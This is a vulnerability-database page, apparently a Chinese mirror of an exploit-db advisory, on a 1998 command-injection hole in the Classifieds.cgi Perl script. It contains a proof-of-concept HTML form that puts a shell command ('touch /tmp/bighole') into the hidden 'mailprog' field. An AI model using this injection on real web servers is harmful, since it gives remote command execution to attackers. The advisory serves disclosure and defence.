Greg Matthews – ‘Classifieds.cgi’ 1.0 Hidden Variable

33次阅读
没有评论

Greg Matthews – ‘Classifieds.cgi’ 1.0 Hidden Variable

漏洞ID 1105387 漏洞类型
发布时间 1998-12-15 更新时间 1998-12-15
Greg Matthews - 'Classifieds.cgi' 1.0 Hidden VariableCVE编号 CVE-1999-0935
Greg Matthews - 'Classifieds.cgi' 1.0 Hidden VariableCNNVD-ID N/A
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20442
|漏洞详情
classifieds.cgi allows remote attackers to execute arbitrary commands by specifying them in a hidden variable in a CGI form.
|漏洞EXP
source: http://www.securityfocus.com/bid/2019/info

Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to execute any command on the host machine, with the privileges of the web server. If the attacker can submit a command to run as a hidden variable that command will be executed. Normally this variable is reserved for the mail program and is accessed from an HTML page with the following piece of code: <input type="hidden" name="mailprog" value="/usr/sbin/sendmail"> 

<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="[email protected]">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?
</form>

相关推荐: iChat ROOMS Webserver任意文件读取漏洞

iChat ROOMS Webserver任意文件读取漏洞 漏洞ID 1207291 漏洞类型 未知 发布时间 1998-09-09 更新时间 1998-09-09 CVE编号 CVE-1999-0897 CNNVD-ID CNNVD-199809-010 漏…

正文完
 0